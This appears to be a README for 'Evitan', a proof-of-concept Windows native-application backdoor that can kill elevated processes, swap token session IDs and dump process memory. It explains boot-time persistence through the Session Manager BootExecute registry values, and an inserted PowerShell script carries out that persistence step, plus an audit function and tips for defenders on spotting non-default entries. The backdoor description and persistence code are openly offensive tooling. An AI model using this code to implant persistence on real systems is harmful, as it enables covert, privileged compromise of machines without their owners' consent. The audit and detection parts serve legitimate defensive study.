A Native Application Subsystem backdoor. Current capabilities:
- Elevated Process / Thread Termination
- Token Session ID Swapping
- Process Memory Dumping
Backdooring a system with Evitan requires a way to:
- Write a file to C:\Windows\System32 (the Session Manager, smss.exe, resolves bare image names in these entries against System32).
- Modify the BootExecute or BootExecuteNoPnpSync REG_MULTI_SZ values under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager registry key, which list the native images smss.exe runs at boot before the Win32 subsystem is started.
Both steps require administrative privileges on the target.
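The two requirements above, as an added PowerShell example that is not part of the Evitan project: it appends a native image name to one of the Session Manager BootExecute values while preserving the stock entries, and it audits both values so a defender can spot anything beyond the default. The image name `evitan` (assumed to have been copied to `C:\Windows\System32\evitan.exe` already) and the function names are assumptions for illustration; the shell must run elevated.

```powershell
# Added example, not code from the Evitan project.
# Assumptions: elevated shell; the native image already sits in System32
# under the (hypothetical) name evitan.exe.

$SessionManager = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
$StockEntries   = @('autocheck autochk *')   # the only entry on a default install

function Get-BootExecuteEntries {
    # Lists every entry of both values; Default=$false marks non-stock entries.
    foreach ($name in 'BootExecute', 'BootExecuteNoPnpSync') {
        $item = Get-ItemProperty -Path $SessionManager -Name $name -ErrorAction SilentlyContinue
        if ($null -eq $item) { continue }                 # value absent (NoPnpSync is optional)
        foreach ($entry in @($item.$name) | Where-Object { $_ }) {
            [pscustomobject]@{
                Value   = $name
                Entry   = $entry
                Default = $StockEntries -contains $entry
            }
        }
    }
}

function Add-BootExecuteEntry {
    param(
        [Parameter(Mandatory)][string]$ImageName,    # bare name, no extension, e.g. 'evitan'
        [ValidateSet('BootExecute', 'BootExecuteNoPnpSync')][string]$Value = 'BootExecute'
    )
    # smss.exe looks the bare name up in System32; refuse if the image is not there yet.
    $image = Join-Path $env:SystemRoot "System32\$ImageName.exe"
    if (-not (Test-Path $image)) { throw "native image not found: $image" }

    $existing = @((Get-ItemProperty -Path $SessionManager -Name $Value -ErrorAction SilentlyContinue).$Value) |
                Where-Object { $_ }
    if ($existing -contains $ImageName) { return }    # already persisted

    # REG_MULTI_SZ: keep autocheck and any other entries, then append ours.
    $new = @($existing) + $ImageName
    if ($existing.Count -eq 0) {
        New-ItemProperty -Path $SessionManager -Name $Value -Value $new -PropertyType MultiString -Force | Out-Null
    } else {
        Set-ItemProperty -Path $SessionManager -Name $Value -Value $new -Type MultiString
    }
}

# Persist (hypothetical image name) and then show what now differs from a clean system.
Add-BootExecuteEntry -ImageName 'evitan' -Value 'BootExecute'
Get-BootExecuteEntries | Where-Object { -not $_.Default }
```

For a defender the last line is the useful part: on a stock install the only entry in either value is `autocheck autochk *`, so any other entry, or a `BootExecuteNoPnpSync` value that exists at all, is worth correlating with recently written files in System32.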
Evitan's inner workings are described in its accompanying blog post which can be found here.
- Pavel's NativeApps
- Pavel's SECArmy Village Grayhat 2020 Presentation
- Protexity's Going Native Blog Post
This code and the blog post are provided only as a POC and are not expected to be production-grade, bug-free code. Please take this into consideration before using Evitan. Moreover, the NativeRun application included in the Evitan project (used to run Native Applications conveniently for testing purposes) is borrowed from Pavel's NativeApps project. It is not required for running Evitan and is only included to facilitate testing (all credit for NativeRun goes to the original author).
Join the Hackcraft community discord server here. On the server you can receive support and discuss issues related to Evitan.